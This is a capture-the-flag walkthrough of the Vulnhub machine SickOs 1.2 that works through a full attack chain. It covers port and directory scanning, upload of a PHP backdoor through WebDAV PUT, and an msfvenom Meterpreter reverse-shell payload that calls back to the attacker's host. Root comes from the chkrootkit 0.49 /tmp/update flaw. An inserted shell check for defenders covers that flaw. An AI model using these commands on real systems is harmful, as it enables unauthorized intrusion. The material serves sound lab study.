SickOs 1.2

SickOs 1.2 - Vulnhub

First, Nmap was run to scan for open ports and running service versions.

nmap -sV 192.168.130.131

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-14 11:29 MDT
Nmap scan report for 192.168.130.131
Host is up (0.00059s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:09:A5:6D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds

Next, dirb was run to scan for directories on the web service running on port 80. The “test” directory was discovered.

dirb http://192.168.130.131 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Oct 14 14:39:53 2016
URL_BASE: http://192.168.130.131/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.130.131/ ----
==> DIRECTORY: http://192.168.130.131/test/                                    
+ http://192.168.130.131/~sys~ (CODE:403|SIZE:345)                             
                            
---- Entering directory: http://192.168.130.131/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
(Use mode '-w' if you want to scan it anyway)
                                
-----------------
END_TIME: Fri Oct 14 14:40:13 2016
DOWNLOADED: 20458 - FOUND: 1

Curl was used to check the allowed HTTP methods by sending an OPTIONS request. For the test directory, the Allow header lists PUT (alongside the other WebDAV methods), so we have permission to upload files to the server.

curl -v 192.168.130.131/test -X OPTIONS
*   Trying 192.168.130.131...
* Connected to 192.168.130.131 (192.168.130.131) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.130.131
> User-Agent: curl/7.50.1
> Accept: */*
> 
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.130.131/test/
< Content-Length: 0
< Date: Fri, 14 Oct 2016 20:38:46 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 192.168.130.131 left intact

Using curl, I was able to upload a PHP backdoor to the server.

cp /usr/share/webshells/php/php-backdoor.php bd.php
curl -T bd.php -0 http://192.168.130.131/test/bd.php

Next, to get a reverse shell, I generated an ELF payload and executed it using the PHP backdoor.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.130.129 lport=443 -f elf -o payload
curl -T payload -0 http://192.168.130.131/test/payload2

Looking at the installed software, we can see that chkrootkit 0.49 is installed. Searching exploit-db shows that this version is vulnerable to privilege escalation.

dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version        Description
+++-==============-==============-============================================
... 
rc  chkrootkit     0.49-4ubuntu1. rootkit detector
...

searchsploit chkrootkit 0.49
---------------------------------------------------------------------- ----------------------------------
Exploit Title                                                         | Path
---------------------------------------------------------------------- ----------------------------------
Chkrootkit 0.49 - Privilege Escalation"                               | /linux/local/33899.txt
---------------------------------------------------------------------- ----------------------------------

The exploit-db entry below explains that the vulnerability is triggered by placing an executable file named 'update' in /tmp, which chkrootkit then runs as root.

cat /usr/share/exploitdb/platforms/linux/local/33899.txt 

...
Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
...
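The exploit-db text above lists three preconditions: an executable /tmp/update owned by a non-root user, /tmp not mounted noexec, and chkrootkit running periodically as root. The following is an added defender-side check for those conditions (not part of the original write-up or of chkrootkit); it assumes Linux (/proc/mounts) and a POSIX find(1), and it never runs chkrootkit or executes the file it inspects.

```sh
# Added check for the preconditions quoted from the exploit-db text: an
# executable /tmp/update owned by a non-root user, /tmp not mounted noexec,
# and chkrootkit run from cron. Assumes Linux (/proc/mounts) and POSIX find(1);
# it never runs chkrootkit and never executes the file it inspects.

# update_file_state DIR: classify DIR/update as absent, owned-by-root,
# not-executable or EXPOSED (the one state the text says chkrootkit runs as root).
update_file_state() {
    f="$1/update"
    if [ ! -e "$f" ]; then
        echo absent
    elif [ -n "$(find "$f" -prune -user 0)" ]; then
        echo owned-by-root
    elif [ ! -x "$f" ]; then
        echo not-executable
    else
        echo EXPOSED
    fi
}

# mount_noexec DIR: yes/no for the noexec option on the longest-matching
# mount point containing DIR; unknown if /proc/mounts cannot be read.
mount_noexec() {
    target=$(cd "$1" 2>/dev/null && pwd -P) || { echo unknown; return; }
    [ -r /proc/mounts ] || { echo unknown; return; }
    best=; opts=
    while read -r _dev mnt _type mopts _rest; do
        case "$target/" in
            "${mnt%/}/"*) if [ ${#mnt} -ge ${#best} ]; then best=$mnt; opts=$mopts; fi ;;
        esac
    done < /proc/mounts
    case ",$opts," in *,noexec,*) echo yes ;; *) echo no ;; esac
}

# cron_schedules_chkrootkit: yes if the Debian cron.daily hook exists or any crontab fragment mentions it.
cron_schedules_chkrootkit() {
    if [ -e /etc/cron.daily/chkrootkit ] || grep -qs chkrootkit /etc/crontab /etc/cron.d/* 2>/dev/null
    then echo yes; else echo no; fi
}

# chkrootkit_exposure_report [DIR]: print all three findings (DIR defaults to /tmp).
chkrootkit_exposure_report() {
    dir=${1:-/tmp}
    printf 'update file in %s:  %s\n' "$dir" "$(update_file_state "$dir")"
    printf 'noexec on %s:       %s\n' "$dir" "$(mount_noexec "$dir")"
    printf 'chkrootkit in cron: %s\n' "$(cron_schedules_chkrootkit)"
}
```

Run `chkrootkit_exposure_report /tmp` on a host that schedules chkrootkit; any line reading EXPOSED / no / yes together is the combination the advisory describes.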

The ELF payload generated earlier was then copied to /tmp/update.

cp /var/www/test/payload2 /tmp/update

Finally, the reverse shell connects back to us, and we are able to read the proof file.
